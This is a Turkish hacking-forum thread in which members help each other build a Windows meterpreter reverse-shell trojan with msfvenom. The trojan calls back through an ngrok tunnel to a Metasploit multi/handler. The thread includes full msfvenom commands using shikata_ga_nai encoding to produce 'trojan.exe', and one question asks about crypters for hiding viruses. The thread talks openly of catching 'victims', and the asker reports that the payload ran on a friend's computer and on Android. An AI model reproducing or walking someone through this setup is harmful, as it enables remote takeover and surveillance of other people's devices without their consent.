Ngrok port açılmıyor

Howert

Katılımcı Üye
15 Mar 2022
580
1
220
root@Howert
Merhaba. Ngroktan ./ngrok tcp 4444 yazarak port açıyorum ama nmapten tarayınca port kapalı olarak gözüküyor. Port açık olmadığı için meterpreterde kurban düşüremiyorum

Ngroktan port açınca :


Nmap taraması sonucu :


Nasıl bu portu açık tutarım modemden açmayı değilde ngrok'u nasıl düzeltebilirim anlatırsanız sevinirim.
 
Çözüm
Şöyle ki sen kendi ip adresin üzerinden port açık olup olmadığını demişsin eğer ngrokun verdiği ip denersen port açık olduğunu göreceksin. Yani şöyle sen msfvenomda exploit yapacaksın msfvenom -p Windows/meterpreter/reverse_tcp -lhost bu kısma ngrok un verdiği ip yazman gerekiyor. -lport burayada ngrokun verdiği portu yazman gerekiyor /robot/virüs.exe şeklinde yaptıktan sonra exploit hazır hala geliyor msfconsoledan dinlemeye alacağın zaman msfconsole aç
Use Multi/handler.
Set payload Windows/meterpreter/reverse_tcp

Ardından set lhost kendi bilgisiyarinin local ipsini yazman gerekiyor
Set lport 4444
Exploit dediğinde açıldığı zaman kurban düşecektir ama en başta dediğim gibi sen kendi local ip üzerine nmap taraması yaptığın için port...

Bysmartien

Yeni üye
11 Nis 2020
31
0
Merhaba. Ngroktan ./ngrok tcp 4444 yazarak port açıyorum ama nmapten tarayınca port kapalı olarak gözüküyor. Port açık olmadığı için meterpreterde kurban düşüremiyorum

Ngroktan port açınca :


Nmap taraması sonucu :


Nasıl bu portu açık tutarım modemden açmayı değilde ngrok'u nasıl düzeltebilirim anlatırsanız sevinirim.
Merhaba virusleri nasil gizliyorsun elinde crypter varmi?
 

Pelacanus

Katılımcı Üye
28 Haz 2020
462
3
141
Şöyle ki sen kendi ip adresin üzerinden port açık olup olmadığını demişsin eğer ngrokun verdiği ip denersen port açık olduğunu göreceksin. Yani şöyle sen msfvenomda exploit yapacaksın msfvenom -p Windows/meterpreter/reverse_tcp -lhost bu kısma ngrok un verdiği ip yazman gerekiyor. -lport burayada ngrokun verdiği portu yazman gerekiyor /robot/virüs.exe şeklinde yaptıktan sonra exploit hazır hala geliyor msfconsoledan dinlemeye alacağın zaman msfconsole aç
Use Multi/handler.
Set payload Windows/meterpreter/reverse_tcp

Ardından set lhost kendi bilgisiyarinin local ipsini yazman gerekiyor
Set lport 4444
Exploit dediğinde açıldığı zaman kurban düşecektir ama en başta dediğim gibi sen kendi local ip üzerine nmap taraması yaptığın için port kapalı gözükuyor

 
Çözüm

Howert

Katılımcı Üye
15 Mar 2022
580
1
220
root@Howert
Şöyle ki sen kendi ip adresin üzerinden port açık olup olmadığını demişsin eğer ngrokun verdiği ip denersen port açık olduğunu göreceksin. Yani şöyle sen msfvenomda exploit yapacaksın msfvenom -p Windows/meterpreter/reverse_tcp -lhost bu kısma ngrok un verdiği ip yazman gerekiyor. -lport burayada ngrokun verdiği portu yazman gerekiyor /robot/virüs.exe şeklinde yaptıktan sonra exploit hazır hala geliyor msfconsoledan dinlemeye alacağın zaman msfconsole aç
Use Multi/handler.
Set payload Windows/meterpreter/reverse_tcp

Ardından set lhost kendi bilgisiyarinin local ipsini yazman gerekiyor
Set lport 4444
Exploit dediğinde açıldığı zaman kurban düşecektir ama en başta dediğim gibi sen kendi local ip üzerine nmap taraması yaptığın için port kapalı gözükuyor
Teşekkür ederim
 

Howert

Katılımcı Üye
15 Mar 2022
580
1
220
root@Howert
Şöyle ki sen kendi ip adresin üzerinden port açık olup olmadığını demişsin eğer ngrokun verdiği ip denersen port açık olduğunu göreceksin. Yani şöyle sen msfvenomda exploit yapacaksın msfvenom -p Windows/meterpreter/reverse_tcp -lhost bu kısma ngrok un verdiği ip yazman gerekiyor. -lport burayada ngrokun verdiği portu yazman gerekiyor /robot/virüs.exe şeklinde yaptıktan sonra exploit hazır hala geliyor msfconsoledan dinlemeye alacağın zaman msfconsole aç
Use Multi/handler.
Set payload Windows/meterpreter/reverse_tcp

Ardından set lhost kendi bilgisiyarinin local ipsini yazman gerekiyor
Set lport 4444
Exploit dediğinde açıldığı zaman kurban düşecektir ama en başta dediğim gibi sen kendi local ip üzerine nmap taraması yaptığın için port kapalı gözükuyor
msfvenom --payload windows/meterpreter/reverse_tcp LHOST=tcp://5.tcp.eu.ngrok.io LPORT=4444 -e x86/shikata_ga_nai -a x86 -bad- chars '\x00\xff' -f exe > /root/Masaüstü/trojan.exe

Böyle yaparken hata veriyor lhost kısmından dolayı sonunda :bişeybişey koyuncada ngrok linkinin aynı
 

Pelacanus

Katılımcı Üye
28 Haz 2020
462
3
141
msfvenom --payload windows/meterpreter/reverse_tcp LHOST=tcp://5.tcp.eu.ngrok.io LPORT=4444 -e x86/shikata_ga_nai -a x86 -bad- chars '\x00\xff' -f exe > /root/Masaüstü/trojan.exe

Böyle yaparken hata veriyor lhost kısmından dolayı sonunda :bişeybişey koyuncada ngrok linkinin aynı
Yanlış yazıyorsun lhost kısmına sadece 5.tcp.eu.ngrok.io bunu yazacaksın lport kisminada 5.tcp.eu.ngrok.io:"port" tırnak içine aldığım yeri yazacaksın atıyorum port 1234 msfvenomda 1234 yazacaksin

yardımcı olacaktır
 

Howert

Katılımcı Üye
15 Mar 2022
580
1
220
root@Howert
Anladım ama hata LHOST=tcp://bişey bişey yazdığım kısımda. Böyle dimi komutlar :
set LHOST tcp://bişi bişi
set LPORT tcp://bişi bişi:"port" Tırnak içinde olan yer
msfvenom --payload windows/meterpreter/reverse_tcp LHOST=tcp://5.tcp.eu.ngrok.io LPORT=tcpli şeyin yanındaki port işte -e x86/shikata_ga_nai -a x86 -bad- chars '\x00\xff' -f exe > /root/Masaüstü/trojan.exe
 

Pelacanus

Katılımcı Üye
28 Haz 2020
462
3
141
Anladım ama hata LHOST=tcp://bişey bişey yazdığım kısımda. Böyle dimi komutlar :
set LHOST tcp://bişi bişi
set LPORT tcp://bişi bişi:"port" Tırnak içinde olan yer
msfvenom --payload windows/meterpreter/reverse_tcp LHOST=tcp://5.tcp.eu.ngrok.io LPORT=tcpli şeyin yanındaki port işte -e x86/shikata_ga_nai -a x86 -bad- chars '\x00\xff' -f exe > /root/Masaüstü/trojan.exe
TCP:// yazmıyorsun
 

Pelacanus

Katılımcı Üye
28 Haz 2020
462
3
141
[*] Started reverse TCP handler on 192.168.175.128:4444
Bu sefer böyle kaldı kendi pcmde açt
[*] Started reverse TCP handler on 192.168.175.128:4444
Bu sefer böyle kaldı kendi pcmde açtım
Sen kendi local ağ üzerinde denediğinde zaten çalışmaz çünkü sen dış ağ için exploit hazirliyorsun bak yukarda video attım sana orada android için anlatmış onun yaptıklarının aynısını yapıp kendi telefonuna mobil veri açıkken dener misin
 

Howert

Katılımcı Üye
15 Mar 2022
580
1
220
root@Howert
@Pelacanus Ben port açma sorununu alırken kendimde işe yarıyordu bu sefer kendimde işe yaramayınca çalışmadığını sandım. Fakat trojanı kali linuxta yaparken virüsü windowsa attım ondan biraz şüpheliyim. Belki birisinde denerim şimdi telefon şeyini yapmaya gidiyorum
 

Howert

Katılımcı Üye
15 Mar 2022
580
1
220
root@Howert
@Pelacanus Ben port açma sorununu alırken kendimde işe yarıyordu bu sefer kendimde işe yaramayınca çalışmadığını sandım. Fakat trojanı kali linuxta yaparken virüsü windowsa attım ondan biraz şüpheliyim. Belki birisinde denerim şimdi telefon şeyini yapmaya gidiyorum
use multi/handler yaptıktan sonra set LHOST 0.0.0.0 yaptım kendi ipm yerine öyle kendimde çalıştı
Edit: bir arkdada çalıştı
Edit: Android halide çalışıyor
 
Son düzenleme:
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.